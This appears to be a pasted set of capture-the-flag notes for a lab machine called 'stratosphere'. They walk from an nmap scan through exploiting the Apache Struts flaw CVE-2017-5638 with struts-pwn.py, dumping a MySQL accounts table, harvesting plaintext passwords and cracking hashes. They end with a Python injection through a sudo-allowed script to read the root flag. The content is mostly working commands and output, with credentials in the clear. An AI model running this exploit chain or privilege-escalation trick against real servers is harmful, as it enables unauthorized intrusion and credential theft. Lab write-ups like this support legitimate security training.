Untitled

a guest
Jul 19th, 2018
nmap:
22
80
8080
-> /Monitoring/
Checking: python struts-pwn.py --check --url http://stratosphere:8080/Monitoring/
Exploit: python struts-pwn.py --url http://stratosphere:8080/Monitoring/ -c 'ls'

CVE-2017-5638

db_connect in tomcat folder (www)
user=ssn_admin
pass=AWs64@on*&

/etc/tomcat/tomcat-users.xml:
<user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui" />

root@kali:~/stratosphere# ./pwn.sh 'echo "SHOW DATABASES" | mysql -u admin -padmin'
echo "SHOW DATABASES" | mysql -u admin -padmin

[*] URL: http://stratosphere:8080/Monitoring/
[*] CMD: echo "SHOW DATABASES" | mysql -u admin -padmin
Database
information_schema
users

root@kali:~/stratosphere# ./pwn.sh 'echo "use users; show tables;" | mysql -u admin -padmin'
echo "use users; show tables;" | mysql -u admin -padmin

[*] URL: http://stratosphere:8080/Monitoring/
[*] CMD: echo "use users; show tables;" | mysql -u admin -padmin
Tables_in_users
accounts

root@kali:~/stratosphere# ./pwn.sh 'echo "use users; select * from accounts;" | mysql -u admin -padmin'
echo "use users; select gobuster.sh LinEnum.sh nc.sh nikto.sh pwn.sh rev.sh stratosphere_8080_gobust.txt stratosphere_gobust.txt stratosphere_monitoring_8080_nikto.txt stratosphere_nikto_80.txt stratosphere.txt.gnmap stratosphere.txt.nmap stratosphere.txt.xml stratosphese.txt.gnmap stratosphese.txt.nmap stratosphese.txt.xml struts-pwn.py webserver.sh wordlists from accounts;" | mysql -u admin -padmin

[*] URL: http://stratosphere:8080/Monitoring/
[*] CMD: echo "use users; select * from accounts;" | mysql -u admin -padmin
fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

root@kali:~/stratosphere# ./pwn.sh 'echo "use users; describe accounts;" | mysql -u admin -padmin'
echo "use users; describe accounts;" | mysql -u admin -padmin

[*] URL: http://stratosphere:8080/Monitoring/
[*] CMD: echo "use users; describe accounts;" | mysql -u admin -padmin
Field Type Null Key Default Extra
fullName varchar(45) YES NULL
password varchar(30) YES NULL
username varchar(20) YES NULL

Use password to SSH (user richard)

Run sudo -l /usr/bin/python3 /home/richard/test.py

5af003e100c80923ec04d65933d382cb : kaybboo!
d24f6fb449855ff42344feff18ee2819033529ff : ninjaabisshinobi
91ae5fc9ecbca9d346225063f23d2bd9 : legend72

9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943

../run/john /home/hendrik/blake.txt --format=Raw-Blake2 --fork=8 --wordlist=/home/hendrik/rockyou.txt

^^^^^^^^^^^^^^ Rabbit hole but interesting

echo '__import__("os").system("cat /root/root.txt")' | sudo /usr/bin/python2.7 /home/richard/test.py